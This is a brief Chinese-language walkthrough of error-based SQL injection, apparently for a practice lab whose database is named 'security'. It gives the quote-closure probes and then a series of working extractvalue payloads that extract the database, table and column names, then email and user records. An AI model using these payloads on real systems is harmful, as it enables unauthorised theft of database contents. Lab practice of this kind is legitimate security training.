1、判断注入类型
?id=1
?id=1'
?id=1"
可以判断出,为双引号闭合方法,且为报错注入
2、查询库名(security)
?id=1" and (extractvalue(1,concat(0x7e,(select database()),0x7e))) --+
3、查询表名
?id=1" and (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e))) --+
4、查询字段(这里查询了两张表中的字段)
?id=1" and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='emails'),0x7e))) --+
?id=1" and (extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e))) --+
5、分别查询对应表字段中的对应值信息(这里找到获取到邮箱名就可以)
?id=1" and (extractvalue(1,concat(0x7e,(select group_concat(id,email_id) from security.emails),0x7e))) --+
?id=1" and (extractvalue(1,concat(0x7e,(select group_concat(USER) from security.users),0x7e))) --+